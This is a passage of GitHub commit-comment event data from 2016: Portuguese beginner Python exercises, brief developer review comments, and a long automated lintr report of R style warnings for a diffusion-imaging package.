O programa deverá pedir os valores de a, b e c e fazer as consistências, informando ao usuário nas seguintes situações:\r\na. Se o usuário informar o valor de A igual a zero, a equação não é do segundo grau e o programa não deve fazer pedir os demais valores, sendo encerrado;\r\nb. Se o delta calculado for negativo, a equação não possui raizes reais. Informe ao usuário e encerre o programa;\r\nc. Se o delta calculado for igual a zero a equação possui apenas uma raiz real; informe-a ao usuário;\r\nd. Se o delta for positivo, a equação possui duas raiz reais; informe-as ao usuário;\r\n**17.**Faça um Programa que peça um número correspondente a um determinado ano e em seguida informe se este ano é ou não bissexto.\r\n18.Faça um Programa que peça um número inteiro e determine se ele é par ou impar. Dica: utilize o operador módulo (resto da divisão).\r\n**19**.Faça um Programa que leia 2 números e em seguida pergunte ao usuário qual operação ele deseja realizar. O resultado da operação deve ser acompanhado de uma frase que diga se o número é:par ou ímpar; a. positivo ou negativo;\r\n**20**.Faça um programa que faça 5 perguntas para uma pessoa sobre um crime. As perguntas são:\r\n. \"Telefonou para a vítima?\"\r\na. \"Esteve no local do crime?\"\r\nb. \"Mora perto da vítima?\"\r\nc. \"Devia para a vítima?\"\r\nd. \"Já trabalhou com a vítima?\" O programa deve no final emitir uma classificação sobre a participação da pessoa no crime. Se a pessoa responder positivamente a 2 questões ela deve ser classificada como \"Suspeita\", entre 3 e 4 como \"Cúmplice\" e 5 como \"Assassino\". Caso contrário, ele será classificado como\r\n\"Inocente\".\r\n**21**.Um posto está vendendo combustíveis com a seguinte tabela de descontos:\r\n. Álcool:\r\na. até 20 litros, desconto de 3% por litro\r\nb. acima de 20 litros, desconto de 5% por litro\r\nGasolina:\r\nc. até 20 litros, desconto de 4% por litro\r\nd. acima de 20 litros, desconto de 6% por litro \r\nEscreva um algoritmo que leia o número de litros vendidos, o tipo decombustível (codificado da seguinte forma: A-álcool, Ggasolina),calcule e imprima o valor a ser pago pelo cliente sabendo-se que o preço do litro da gasolina é R$ 2,50 o preço do litro do álcool é R$ 1,90.\r\n**22**.Uma fruteira está vendendo frutas com a seguinte tabela de preços:\r\nAté 5 Kg Acima de 5 Kg\r\nMorango R$ 2,50 por Kg R$ 2,20 por Kg\r\nMaçã R$ 1,80 por Kg R$ 1,50 por Kg\r\nSe o cliente comprar mais de 8 Kg em frutas ou o valor total da compra ultrapassar R$ 25,00, receberá ainda um desconto de 10% sobre este total. Escreva um algoritmo para ler a quantidade (em Kg) de morangos e a quantidade (em Kg) de maças adquiridas e escreva o valor a ser pago pelo cliente.\r\n**23**.O Hipermercado Tabajara está com uma promoção de carnes que é imperdível. Confira:\r\n- Até 5 Kg Acima de 5 Kg\r\n- File Duplo R$ 4,90 por Kg R$ 5,80 por Kg\r\n- Alcatra R$ 5,90 por Kg R$ 6,80 por Kg\r\n- Picanha R$ 6,90 por Kg R$ 7,80 por Kg\r\nPara atender a todos os clientes, cada cliente poderá levar apenas um dos tipos de carne da promoção, porém não há limites para a quantidade de carne por cliente. Se compra for feita no cartão Tabajara o cliente receberá ainda um desconto de 5% sobre o total a compra. Escreva um programa que peça\r\no tipo e a quantidade de carne comprada pelo usuário e gere um cupom fiscal, contendo as informações da compra: tipo e quantidade de carne, preço total, tipo de pagamento, valor do\r\ndesconto e valor a pagar.\r\n\r\nFonte dos exercícios: http://wiki.python.org.br/EstruturaDeDecisao"}},"created_at":"2016-09-26T20:06:15Z"}
{"id":"4620111493","type":"CommitCommentEvent","actor":{"login":"luandacostasilva"},"repo":{"name":"luandacostasilva/aprendendo-git"},"payload":{"comment":{"id":19178939,"position":6,"line":5,"path":"LiberaOTom.java","commit_id":"d84d1641303d108793eff03d19b302122f825862","created_at":"2016-09-26T20:06:17Z","updated_at":"2016-09-26T20:06:17Z","body":"Adiciona Liberar o Tom antes de rodando"}},"created_at":"2016-09-26T20:06:17Z"}
{"id":"4620114299","type":"CommitCommentEvent","actor":{"login":"luandacostasilva"},"repo":{"name":"luandacostasilva/aprendendo-git"},"payload":{"comment":{"id":19178956,"position":6,"line":5,"path":"LiberaOTom.java","commit_id":"d84d1641303d108793eff03d19b302122f825862","created_at":"2016-09-26T20:06:46Z","updated_at":"2016-09-26T20:06:46Z","body":"antes de \"RODANDO\""}},"created_at":"2016-09-26T20:06:46Z"}
{"id":"4620136807","type":"CommitCommentEvent","actor":{"login":"hizzlekizzle"},"repo":{"name":"libretro/beetle-pce-fast-libretro"},"payload":{"comment":{"id":19179003,"position":null,"line":null,"path":null,"commit_id":"aa98d9726db8292e7dfa5e14f3b1103d5b0eae3d","created_at":"2016-09-26T20:10:58Z","updated_at":"2016-09-26T20:10:58Z","body":"well shit. I'll revert it as soon as I get home, then :/\r\n\r\nI believe the main goal was to maintain the pixel aspect ratio when games changed their resolution on the fly but the first/last scanline thing is pretty important, IMO, so it's better to revert it, I guess."}},"created_at":"2016-09-26T20:10:58Z"}
{"id":"4620143893","type":"CommitCommentEvent","actor":{"login":"sevoku"},"repo":{"name":"mono/xwt"},"payload":{"comment":{"id":19179020,"position":null,"line":null,"path":null,"commit_id":"c58c6f22fe4346cc4a97b4cca21ca0a721f43927","created_at":"2016-09-26T20:12:19Z","updated_at":"2016-09-26T20:12:19Z","body":"Works fine for me. Do you get an Exception, or is it a crash in the native code? Which Gtk3 , Gtk-sharp version?"}},"created_at":"2016-09-26T20:12:19Z"}
{"id":"4620147195","type":"CommitCommentEvent","actor":{"login":"rmacklin"},"repo":{"name":"AppFolioOnboarding/image-sharer-kkajla12"},"payload":{"comment":{"id":19179029,"position":null,"line":null,"path":null,"commit_id":"4e0beaba3424f1249481b14ef678b9accdb94615","created_at":"2016-09-26T20:12:55Z","updated_at":"2016-09-26T20:12:55Z","body":"This commit also modifies the images/new form, but that change should not be fixed up into the addition of the share page. That change should be its own commit (and could be its own PR)"}},"created_at":"2016-09-26T20:12:55Z"}
{"id":"4620148832","type":"CommitCommentEvent","actor":{"login":"arnoBruynseels"},"repo":{"name":"pxlit-projects/classroom-exercise-1-arnoBruynseels"},"payload":{"comment":{"id":19179033,"position":null,"line":null,"path":null,"commit_id":"560f7e7f30d9947001e4238e7784ef975478a7fb","created_at":"2016-09-26T20:13:12Z","updated_at":"2016-09-26T20:13:12Z","body":"Beste meneer Schraepen\n\n\nik heb altijd al mijn curly brackets zo gezet. Ik vind dit veel duidelijker voor mezelf.\n\n\nmvg\n\n\nArno Bruynseels\n\n________________________________\nVan: Tim Schraepen <notifications@github.com>\nVerzonden: maandag 26 september 2016 19:57:19\nAan: pxlit-projects/classroom-exercise-1-arnoBruynseels\nCC: Arno Bruynseels; Author\nOnderwerp: Re: [pxlit-projects/classroom-exercise-1-arnoBruynseels] Oefening 1 Afgemaakt (560f7e7)\n\n\nGoede oplossing.\n\nKheb wel efkes door de formatting moeten uit lezen.\n\nIs dat uw eigen voorkeur, of is dat gewoon een instelling van uwe IDE?\n\nIk heb het over de plaatsing van de curly braces.\n\npublic void derp()\n{\n   ...\n}\n\n\nipv\n\npublic void derp() {\n   ...\n}\n\n\n-\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub<https://github.com/pxlit-projects/classroom-exercise-1-arnoBruynseels/commit/560f7e7f30d9947001e4238e7784ef975478a7fb#commitcomment-19176622>, or mute the thread<https://github.com/notifications/unsubscribe-auth/ALFtBs59V0p__9RS4Bhu0cNL3Bxbav8Tks5quAd_gaJpZM4KG0DP>.\n"}},"created_at":"2016-09-26T20:13:12Z"}
{"id":"4620149215","type":"CommitCommentEvent","actor":{"login":"loosebazooka"},"repo":{"name":"GoogleCloudPlatform/app-gradle-plugin"},"payload":{"comment":{"id":19179035,"position":null,"line":null,"path":null,"commit_id":"5769c73f457c0c1216696794374534fa053df6ac","created_at":"2016-09-26T20:13:17Z","updated_at":"2016-09-26T20:13:17Z","body":"@meltsufin "}},"created_at":"2016-09-26T20:13:17Z"}
{"id":"4620149485","type":"CommitCommentEvent","actor":{"login":"bloatware"},"repo":{"name":"textpattern/textpattern"},"payload":{"comment":{"id":19179037,"position":null,"line":null,"path":null,"commit_id":"4cb72a885113b467328ac7c4c82f97b7350165e1","created_at":"2016-09-26T20:13:20Z","updated_at":"2016-09-26T20:13:20Z","body":"Will check tomorrow if `is_writable(txpath.DS.'..')` alone suffices."}},"created_at":"2016-09-26T20:13:20Z"}
{"id":"4620150231","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"muschellij2/rcamino"},"payload":{"comment":{"id":19179038,"position":null,"line":null,"path":null,"commit_id":"26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7","created_at":"2016-09-26T20:13:26Z","updated_at":"2016-09-26T20:13:26Z","body":"[R/camino_adcfit.R:10:15:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_adcfit.R#L10) *style:* **Use <-, not =, for assignment.**\n```r\n​camino_adcfit = function(infile,\n              ^\n```\n[R/camino_adcfit.R:17:18:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_adcfit.R#L17) *style:* **Use <-, not =, for assignment.**\n```r\n​  outputdatatype = match.arg(outputdatatype)\n                 ^\n```\n[R/camino_adcfit.R:20:13:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_adcfit.R#L20) *style:* **Use <-, not =, for assignment.**\n```r\n​    outfile = tempfile(fileext = paste0(\".B\", outputdatatype))\n            ^\n```\n[R/camino_adcfit.R:22:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_adcfit.R#L22) *style:* **Use <-, not =, for assignment.**\n```r\n​  opts = c(infile, scheme)\n       ^\n```\n[R/camino_adcfit.R:23:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_adcfit.R#L23) *style:* **Use <-, not =, for assignment.**\n```r\n​  opts = paste0(opts, collapse = \" \")\n       ^\n```\n[R/camino_adcfit.R:25:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_adcfit.R#L25) *style:* **Use <-, not =, for assignment.**\n```r\n​  cmd = camino_cmd(\"adcfit\")\n      ^\n```\n[R/camino_adcfit.R:26:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_adcfit.R#L26) *style:* **Use <-, not =, for assignment.**\n```r\n​  cmd = paste(cmd, opts, \" > \", outfile)\n      ^\n```\n[R/camino_adcfit.R:31:3:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_adcfit.R#L31) *warning:* **local variable ‘res’ assigned but may not be used**\n```r\n​  res = system(cmd)\n  ^~~\n```\n[R/camino_adcfit.R:31:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_adcfit.R#L31) *style:* **Use <-, not =, for assignment.**\n```r\n​  res = system(cmd)\n      ^\n```\n[R/camino_cmd.R:9:12:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_cmd.R#L9) *style:* **Use <-, not =, for assignment.**\n```r\n​camino_cmd = function(funcname){\n           ^\n```\n[R/camino_compute.R:13:16:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_compute.R#L13) *style:* **Use <-, not =, for assignment.**\n```r\n​camino_compute = function(\n               ^\n```\n[R/camino_compute.R:23:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_compute.R#L23) *style:* **Use <-, not =, for assignment.**\n```r\n​  cmd = match.arg(cmd)\n      ^\n```\n[R/camino_compute.R:24:10:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_compute.R#L24) *style:* **Use <-, not =, for assignment.**\n```r\n​  infile = checkimg(infile)\n         ^\n```\n[R/camino_compute.R:27:19:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_compute.R#L27) *style:* **Use <-, not =, for assignment.**\n```r\n​    inputdatatype = match.arg(inputdatatype,\n                  ^\n```\n[R/camino_compute.R:31:18:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_compute.R#L31) *style:* **Use <-, not =, for assignment.**\n```r\n​  outputdatatype = match.arg(outputdatatype)\n                 ^\n```\n[R/camino_compute.R:33:13:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_compute.R#L33) *style:* **Use <-, not =, for assignment.**\n```r\n​    outfile = tempfile(fileext = paste0(\".B\", outputdatatype))\n            ^\n```\n[R/camino_compute.R:35:14:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_compute.R#L35) *style:* **Use <-, not =, for assignment.**\n```r\n​  inputmodel = match.arg(inputmodel)\n             ^\n```\n[R/camino_compute.R:37:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_compute.R#L37) *style:* **Use <-, not =, for assignment.**\n```r\n​  opts = c( \"-inputmodel\" = inputmodel,\n       ^\n```\n[R/camino_compute.R:41:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_compute.R#L41) *style:* **Use <-, not =, for assignment.**\n```r\n​  opts = paste(names(opts), opts, collapse = \" \")\n       ^\n```\n[R/camino_compute.R:42:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_compute.R#L42) *style:* **Use <-, not =, for assignment.**\n```r\n​  opts = paste0(opts, \" > \", shQuote(outfile))\n       ^\n```\n[R/camino_compute.R:44:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_compute.R#L44) *style:* **Use <-, not =, for assignment.**\n```r\n​  cmd = camino_cmd(cmd)\n      ^\n```\n[R/camino_compute.R:45:9:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_compute.R#L45) *style:* **Use <-, not =, for assignment.**\n```r\n​  start = paste0(\"cat \", shQuote(infile), \" | \")\n        ^\n```\n[R/camino_compute.R:46:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_compute.R#L46) *style:* **Use <-, not =, for assignment.**\n```r\n​  cmd = paste(start,  cmd, opts)\n      ^\n```\n[R/camino_compute.R:50:3:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_compute.R#L50) *warning:* **local variable ‘res’ assigned but may not be used**\n```r\n​  res = system(cmd)\n  ^~~\n```\n[R/camino_compute.R:50:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_compute.R#L50) *style:* **Use <-, not =, for assignment.**\n```r\n​  res = system(cmd)\n      ^\n```\n[R/camino_compute.R:60:11:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_compute.R#L60) *style:* **Use <-, not =, for assignment.**\n```r\n​camino_fa = function(...) {\n          ^\n```\n[R/camino_compute.R:69:11:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_compute.R#L69) *style:* **Use <-, not =, for assignment.**\n```r\n​camino_md = function(...) {\n          ^\n```\n[R/camino_compute.R:79:12:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_compute.R#L79) *style:* **Use <-, not =, for assignment.**\n```r\n​camino_trd = function(...) {\n           ^\n```\n[R/camino_dt2nii.R:15:15:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dt2nii.R#L15) *style:* **Use <-, not =, for assignment.**\n```r\n​camino_dt2nii = function(infile,\n              ^\n```\n[R/camino_dt2nii.R:17:1:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dt2nii.R#L17) *style:* **lines should not be more than 80 characters.**\n```r\n​                         inputmodel = c(\"dt\", \"twotensor\", \"threetensor\", \"multitensor\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/camino_dt2nii.R:25:10:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dt2nii.R#L25) *style:* **Use <-, not =, for assignment.**\n```r\n​  infile = checkimg(infile)\n         ^\n```\n[R/camino_dt2nii.R:26:10:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dt2nii.R#L26) *style:* **Use <-, not =, for assignment.**\n```r\n​  header = checkimg(header)\n         ^\n```\n[R/camino_dt2nii.R:27:14:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dt2nii.R#L27) *style:* **Use <-, not =, for assignment.**\n```r\n​  inputmodel = match.arg(inputmodel)\n             ^\n```\n[R/camino_dt2nii.R:29:19:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dt2nii.R#L29) *style:* **Use <-, not =, for assignment.**\n```r\n​    maxcomponents = NULL\n                  ^\n```\n[R/camino_dt2nii.R:44:20:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dt2nii.R#L44) *style:* **Use <-, not =, for assignment.**\n```r\n​    outputdatatype = match.arg(outputdatatype,\n                   ^\n```\n[R/camino_dt2nii.R:49:16:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dt2nii.R#L49) *style:* **Use <-, not =, for assignment.**\n```r\n​    outputroot = tempfile(fileext = \"_\")\n               ^\n```\n[R/camino_dt2nii.R:52:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dt2nii.R#L52) *style:* **Use <-, not =, for assignment.**\n```r\n​  opts = c( \"-inputfile\" = infile,\n       ^\n```\n[R/camino_dt2nii.R:59:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dt2nii.R#L59) *style:* **Use <-, not =, for assignment.**\n```r\n​  ext = \".nii\"\n      ^\n```\n[R/camino_dt2nii.R:61:10:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dt2nii.R#L61) *style:* **Use <-, not =, for assignment.**\n```r\n​    opts = c(opts, \"-gzip\" = \"\")\n         ^\n```\n[R/camino_dt2nii.R:62:9:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dt2nii.R#L62) *style:* **Use <-, not =, for assignment.**\n```r\n​    ext = \".nii.gz\"\n        ^\n```\n[R/camino_dt2nii.R:64:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dt2nii.R#L64) *style:* **Use <-, not =, for assignment.**\n```r\n​  opts = collapse_opts(opts)\n       ^\n```\n[R/camino_dt2nii.R:66:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dt2nii.R#L66) *style:* **Use <-, not =, for assignment.**\n```r\n​  cmd = camino_cmd(\"dt2nii\")\n      ^\n```\n[R/camino_dt2nii.R:67:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dt2nii.R#L67) *style:* **Use <-, not =, for assignment.**\n```r\n​  cmd = paste(cmd, opts)\n      ^\n```\n[R/camino_dt2nii.R:71:3:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dt2nii.R#L71) *warning:* **local variable ‘res’ assigned but may not be used**\n```r\n​  res = system(cmd)\n  ^~~\n```\n[R/camino_dt2nii.R:71:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dt2nii.R#L71) *style:* **Use <-, not =, for assignment.**\n```r\n​  res = system(cmd)\n      ^\n```\n[R/camino_dt2nii.R:76:12:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dt2nii.R#L76) *style:* **Use <-, not =, for assignment.**\n```r\n​  out_suff = c(\"exitcode\", \"lns0\")\n           ^\n```\n[R/camino_dt2nii.R:79:14:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dt2nii.R#L79) *style:* **Use <-, not =, for assignment.**\n```r\n​    out_suff = c(out_suff, \"dt\")\n             ^\n```\n[R/camino_dt2nii.R:81:12:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dt2nii.R#L81) *style:* **Use <-, not =, for assignment.**\n```r\n​    n_comp = switch(inputmodel,\n           ^\n```\n[R/camino_dt2nii.R:85:15:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dt2nii.R#L85) *style:* **Use <-, not =, for assignment.**\n```r\n​    add_suffs = c(sapply(seq_along(n_comp), function(x){\n              ^\n```\n[R/camino_dt2nii.R:88:14:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dt2nii.R#L88) *style:* **Use <-, not =, for assignment.**\n```r\n​    out_suff = c(out_suff, add_suffs)\n             ^\n```\n[R/camino_dt2nii.R:90:12:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dt2nii.R#L90) *style:* **Use <-, not =, for assignment.**\n```r\n​  outfiles = paste0(outputroot, out_suff, ext)\n           ^\n```\n[R/camino_dteig.R:13:14:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dteig.R#L13) *style:* **Use <-, not =, for assignment.**\n```r\n​camino_dteig = function(infile,\n             ^\n```\n[R/camino_dteig.R:15:1:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dteig.R#L15) *style:* **lines should not be more than 80 characters.**\n```r\n​                        inputmodel = c(\"dt\", \"twotensor\", \"threetensor\", \"multitensor\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/camino_dteig.R:22:10:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dteig.R#L22) *style:* **Use <-, not =, for assignment.**\n```r\n​  infile = checkimg(infile)\n         ^\n```\n[R/camino_dteig.R:23:14:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dteig.R#L23) *style:* **Use <-, not =, for assignment.**\n```r\n​  inputmodel = match.arg(inputmodel)\n             ^\n```\n[R/camino_dteig.R:29:16:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dteig.R#L29) *style:* **Use <-, not =, for assignment.**\n```r\n​    inputmodel = \"multitensor\"\n               ^\n```\n[R/camino_dteig.R:31:21:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dteig.R#L31) *style:* **Use <-, not =, for assignment.**\n```r\n​      maxcomponents = 2\n                    ^\n```\n[R/camino_dteig.R:35:16:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dteig.R#L35) *style:* **Use <-, not =, for assignment.**\n```r\n​    inputmodel = \"multitensor\"\n               ^\n```\n[R/camino_dteig.R:37:21:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dteig.R#L37) *style:* **Use <-, not =, for assignment.**\n```r\n​      maxcomponents = 3\n                    ^\n```\n[R/camino_dteig.R:54:18:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dteig.R#L54) *style:* **Use <-, not =, for assignment.**\n```r\n​  outputdatatype = match.arg(outputdatatype)\n                 ^\n```\n[R/camino_dteig.R:56:13:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dteig.R#L56) *style:* **Use <-, not =, for assignment.**\n```r\n​    outfile = tempfile(fileext = paste0(\".B\", outputdatatype))\n            ^\n```\n[R/camino_dteig.R:58:11:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dteig.R#L58) *style:* **Use <-, not =, for assignment.**\n```r\n​  outfile = shQuote(outfile)\n          ^\n```\n[R/camino_dteig.R:60:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dteig.R#L60) *style:* **Use <-, not =, for assignment.**\n```r\n​  opts = c( \"-inputfile\" = infile,\n       ^\n```\n[R/camino_dteig.R:65:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dteig.R#L65) *style:* **Use <-, not =, for assignment.**\n```r\n​  opts = paste(names(opts), opts, collapse = \" \")\n       ^\n```\n[R/camino_dteig.R:67:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dteig.R#L67) *style:* **Use <-, not =, for assignment.**\n```r\n​  cmd = camino_cmd(\"dteig\")\n      ^\n```\n[R/camino_dteig.R:68:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dteig.R#L68) *style:* **Use <-, not =, for assignment.**\n```r\n​  cmd = paste(cmd, opts, \" > \", outfile)\n      ^\n```\n[R/camino_dteig.R:72:3:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dteig.R#L72) *warning:* **local variable ‘res’ assigned but may not be used**\n```r\n​  res = system(cmd)\n  ^~~\n```\n[R/camino_dteig.R:72:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dteig.R#L72) *style:* **Use <-, not =, for assignment.**\n```r\n​  res = system(cmd)\n      ^\n```\n[R/camino_dteig.R:79:1:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dteig.R#L79) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/camino_dteig.R:80:1:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_dteig.R#L80) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/camino_fsl2scheme.R:34:19:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_fsl2scheme.R#L34) *style:* **Use <-, not =, for assignment.**\n```r\n​camino_fsl2scheme = function(\n                  ^\n```\n[R/camino_fsl2scheme.R:52:13:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_fsl2scheme.R#L52) *style:* **Use <-, not =, for assignment.**\n```r\n​    outfile = tempfile(fileext = \".scheme\")\n            ^\n```\n[R/camino_fsl2scheme.R:56:11:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_fsl2scheme.R#L56) *style:* **Use <-, not =, for assignment.**\n```r\n​    tfile = tempfile(fileext = \".txt\")\n          ^\n```\n[R/camino_fsl2scheme.R:57:11:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_fsl2scheme.R#L57) *style:* **Use <-, not =, for assignment.**\n```r\n​    bvecs = apply(bvecs, 1, paste, collapse = \" \")\n          ^\n```\n[R/camino_fsl2scheme.R:59:11:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_fsl2scheme.R#L59) *style:* **Use <-, not =, for assignment.**\n```r\n​    bvecs = tfile\n          ^\n```\n[R/camino_fsl2scheme.R:63:11:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_fsl2scheme.R#L63) *style:* **Use <-, not =, for assignment.**\n```r\n​    tfile = tempfile(fileext = \".txt\")\n          